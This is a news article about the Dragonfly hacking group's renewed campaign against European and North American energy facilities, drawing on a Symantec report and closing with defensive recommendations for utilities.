A group of cybercriminals is targeting energy facilities in Europe and North America as part of a fresh wave of cybersecurity attacks that could lead to the disruption or sabotage of operational systems.
Though the group — called “Dragonfly” — has been at work since 2011, it became quiet after its operations were exposed by researchers in 2014. However, a new report by security specialist Symantec suggested the group has been active again since 2015 and has increased its operations through 2017.
The report presented more evidence of the threat facing executives who run critical infrastructure, such as energy facilities. IT managers in these organizations should take note of the risks highlighted by Symantec and look to reduce the threat through security best practices.
What Is Dragonfly?
According to SecurityWeek, the Dragonfly group is also known as Energetic Bear, Crouching Yeti and Iron Liberty. During its two-year lull, the group did not stop operations and instead worked to update its activities, according to Bleeping Computer.
In a blog post detailing its new analysis, Symantec suggested the group now aims to sabotage or gain control of operational systems in energy facilities. The researchers noted a distinct increase in activity through 2017 and suggested Dragonfly launched attacks in the U.S., Turkey and Switzerland. Symanetc also detected signs of action outside these nations.
Dissecting Dragonfly’s Techniques
The first activity of the renewed campaign, referred to as “Dragonfly 2.0,” came in the form of a malicious email campaign to the energy sector through December 2015. According to Symanetc, Dragonfly 2.0 relies on a range of other attack vectors, including watering hole attacks used to harvest network credentials and Trojanized software.
The attackers often use widely available malware via administration tools such as PowerShell, PsExec and BITSAdmin. Symantec suggested this use of standard malware might be part of a strategy to mask the group’s identity. The attackers typically install backdoors onto a victim’s computer to provide remote access to systems.
Researchers suggested the most concerning evidence centers on screen captures. Some of these captures included sensitive details such as the location of the infected machine and the name of the host organization. Many of these descriptions included the string cntrl, which is a potential indication that these machines have operational system access.
Symantec reported the amount of conflicting evidence about Dragonfly activities makes it difficult to state the origins of the group and the individuals involved. However, the firm referred to Dragonfly as a highly experienced threat actor with the capability to materially disrupt utility organizations. The long-term plans of the group remain uncertain.
Protecting the Energy Sector From Cybersecurity Attacks
An increasing number of experts recognize that energy and utilities organizations worldwide are focusing on cybersecurity attacks. The FBI and Department of Homeland Security issued a joint report earlier this year warning about the risk to nuclear power stations and other energy facilities, The New York Times reported.
Last month, the National Infrastructure Advisory Council (NIAC) published a draft report detailing the complex risks associated with critical infrastructure sectors. NIAC made 11 specific recommendations, including the establishment of specific network paths and reserved spectrum for backup communications during emergencies.
News of this ever-increasing threat represents a significant warning signal to executives running utility facilities and other elements of critical infrastructure. The Symantec researchers ended their report with several security recommendations, such as using strong passwords, implementing multiple protection systems and establishing an enforceable security policy with an emphasis on employee education programs.